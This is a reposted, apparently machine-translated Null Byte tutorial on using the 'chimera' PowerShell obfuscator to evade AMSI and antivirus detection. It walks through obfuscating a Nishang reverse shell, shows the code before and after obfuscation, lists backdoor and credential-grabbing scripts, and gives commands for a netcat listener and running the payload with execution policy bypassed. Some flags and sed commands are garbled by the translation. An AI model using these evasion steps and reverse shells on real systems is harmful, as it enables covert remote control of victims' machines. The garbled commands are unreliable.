قالب وردپرس درنا توس
Home / Tips and Tricks / How to bypass VirusTotal and AMSI detection signatures with chimera «Null Byte :: WonderHowTo

How to bypass VirusTotal and AMSI detection signatures with chimera «Null Byte :: WonderHowTo



Microsoft’s integrated anti-malware solution strives to prevent common attacks. Unfortunately for Windows 10 users, bypassing the detection requires almost no effort. An attacker armed with this knowledge can easily bypass security software using any number of tools.

Because Microsoft’s antimalware solution is Windows 10’s first line of defense, it has been the subject of numerous excellent security research. This article provides a brief introduction to how attackers can evade it completely.

What is Antimalware Scan Interface (AMSI)?

The backbone of the Microsoft antimalware introduced in Windows 1

0 is the Windows Antimalware Scan Interface (AMSI). Antivirus applications, including Windows Defender, can call their APIs to request a scan for malicious software, scripts, and other content. To briefly describe it, let’s look at Microsoft’s definition:

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to be integrated into any antimalware product on a computer. AMSI provides advanced malware protection for your end users and their data, applications and workloads.

In the screenshot below, the attacker downloads a script (“shell.ps1”) containing nefarious code to instantly connect to a remote server. When trying to run PowerShell scripts in this way, AMSI uses signature-based detection to identify malicious activity.

Below is an image of the same script used after obfuscation. Windows 10 has no problems running. Any message is printed in the terminal while a connection to the attacker’s server is established.

How chimera works

Chimera is a PowerShell obfuscation script that I created to bypass Microsoft’s AMSI as well as commercial antivirus solutions. It processes malicious PowerShell scripts known to trigger antivirus software and uses simple string substitution and variable concatenation to evade common detection signatures. Below is an example of chimera at work.

The following is an excerpt from Invoke-PowerShellTcp.ps1, the same “shell.ps1” script that previously triggered AMSI.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

VirusTotal reports 25 detections of the script (see below). This comes as no surprise as Invoke-PowerShellTcp.ps1 is incredibly popular.

Here is the same snippet after being processed by Chimera:

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal reports 0 detections of the obfuscated version.

Even though I uploaded an example to VirusTotal, this is a very bad practice. As stated in the privacy policy:

All partners receive examples that their antivirus engines did not detect as potentially harmful if the same example was detected as malicious by at least one antivirus engine from another partner. This exchange of information helps address potential vulnerabilities across the security industry.

In simpler terms, if only one anti-virus engine detects a file created by Chimera, the file will be distributed to over 75 anti-virus companies. So do not upload files that were created with an obfuscation tool to VirusTotal. Instead, use a local offline Windows 10 VM with antivirus solutions installed. That way, a detected file won’t be distributed to all of the major security companies on the planet.

Step 1: Clone the Chimera Repository

To get started with Chimera, use the following command to update the APT repository and install the necessary dependencies that Chimera needs to operate properly.

~$ sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

[sudo] password for user:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
curl is already the newest version (7.68.0-1+b1).
curl set to manually installed.
gawk is already the newest version (1:5.0.1+dfsg-1).
gawk set to manually installed.
grep is already the newest version (3.4-1).
libc-bin is already the newest version (2.31-2).
perl is already the newest version (5.30.3-4).
sed is already the newest version (4.7-1).
xxd is already the newest version (2:8.2.0716-3).
The following additional packages will be installed:
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
The following NEW packages will be installed:
   jq (1.6-1)
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 378 kB of archives.

Then clone my Chimera repository with the Git clone Command. I put it in my / opt / chimera directory as shown below.

~$ sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

Cloning into '/opt/chimera'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 1.79 MiB/s, done.

Further recursive (-R) Change ownership of the directory to allow non-root access to the files.

~$ sudo chown $USER:$USER -R /opt/chimera/

Change now (CD) into the new / opt / chimera Directory.

~$ cd /opt/chimera/

And raise the permissions of the chimera.sh Script to enable execution in Kali.

/opt/chimera$ sudo chmod +x chimera.sh

To see the options available, run Chimera with the –Help Dispute.

/opt/chimera$ ./chimera.sh --help

    ░ ./chimera --file powershell.ps1 --all --output /tmp/payload.ps1

  files:
    -f, --file          powershell file.ps1 to obfuscate
    -o, --output        override default output file location

  options:
    -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e
    -l, --level         level of string manipulation (0=random,1=low,
                        2=med,3=high,4=higher,5=insane. default: 0)
    -v, --variables     replace variables with arbitrary strings,
                        use -v  to utilize
                        custom wordlist as variable name substitutions
    -t, --typedata      replace data types with arbitrary strings (e.g.,
                        System.IO.StreamWriter). use -t  to
                        include more
    -c, --comments      replace comments with arbitrary strings
                        use -c  to utillized custom
                        text instead of random strings
    -i, --insert        insert arbitrary comments into every line
    -h, --hex           convert ip addresses to hexidecimal values
    -s, --string        obfuscate provided strings, use -s 
    -b, --backticks     insert backticks into provided string, e.g., ne`w`-OB`je`cT
    -j, --functions     replace function names with arbitrary strings
    -d, --decimal       convert obfuscated payload to decimal format
                        improves AMSI evasion; increases AV detection
    -g, --nishang       remove nishang-specific characteristics
    -k, --keywords      search obfuscated output for words that may trigger
                        AV/VT. By default searches for common words (backdoor,
                        payload,nishang), use -k  to include more
    -r, --random        randomize character punctuation
    -p, --prepend       prepend random number of spaces to lines

  misc:
    -e, --examine       preview snippets of output file contents
    -q, --quiet         supress non-essential messages
    -z, --no-art        if you hate awesome ascii art
        --help          you're looking at it

Step 2: obfuscate a PowerShell script

There are several Nishang scripts and some generic ones in the shells / directory. All have been tested and working. However, there is no telling how untested scripts will be reproduced with Chimera. It is recommended that you only use the provided clams.

/opt/chimera$ ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 user user 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 user user 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 user user  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 user user 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 user user  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 user user 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 user user  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 user user 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxr-xr-x 2 user user 4096 Aug 30 18:53 misc
-rwxrwx--- 1 user user  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 user user 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 user user 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 user user  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 user user 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 user user 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Before using the scripts, change the hard-coded IP addresses (192.168.56.101) to your Kali address. Use to find your internal IP address ip -approx and look for the address 192.168.XX. If you don’t see any of these, your Kali system is likely being set up with NAT. You want to power off the VM and use a host-only networking configuration.

/opt/chimera$ sed -i 's/192.168.56.101//g' shells/*.ps1

The standard port with all scripts is 4444. Use and again to change them if necessary.

/opt/chimera$ sed -i 's/4444//g' shells/*.ps1

Now use the following command to obfuscate one of the available scripts with Chimera.

/opt/chimera$ ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

Much happens in the order. I’ll break down each argument briefly, but read the instruction sheet for a full explanation and a cheatsheet for examples. Also, remember to use –Help for broader descriptions.

  • -f: The input file.
  • -The: The output file.
  • -G: Omit some Nishang-specific features from the script.
  • -v: Replace variable names.
  • -t: Replacement data types.
  • -j: Replace function name.
  • -I: Add any comments on each line.
  • -c: Replace comments with any data.
  • -H: Convert IP addresses to hexadecimal format.
  • -s: Replace different strings.
  • -b: Backtick strings where possible.
  • -e: Examine the obfuscated file when the process is complete.

Step 3: get a shell

In a new terminal, start a Netcat listener to receive incoming connections. Be sure to always use -v Some of the scripts do not generate a shell prompt when a new connection is established.

~$ nc -v -l -p 4444

listening on [any] 4444 ...

Move the chimera.ps1 File from Kali to a local Windows 10 computer. Then open a PowerShell terminal and run the file with the following command.

PS> powershell.exe -ep bypass C:pathtochimera.ps1

Back in Kali, the nc The terminal produces the following output – with no complaints from AMSI.

~$ nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:Userstarget>

AMSI is great, but not hackproof

Creating defensive security tools is not an easy task. Microsoft’s antimalware scanning interface is a perfect example of this. A motivated attacker will always find a way to slip past security. In the case of chimera, strings are simply broken down into many parts and reconstructed as variables. Other projects like Invoke-Obfuscation take evasion to a masterful level.

Follow me on Twitter @tokyoneon_ and GitHub to keep up to date with my current projects. And for any questions and concerns, please leave a comment or ping me on Twitter.

Would you like to make money as a hacker with a white hat? Start your white hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and receive over 60 hours of training from ethical hacking professionals.

Buy now (90% discount)>

Cover picture, screenshots and GIF from tokyoneon / Null Byte




Source link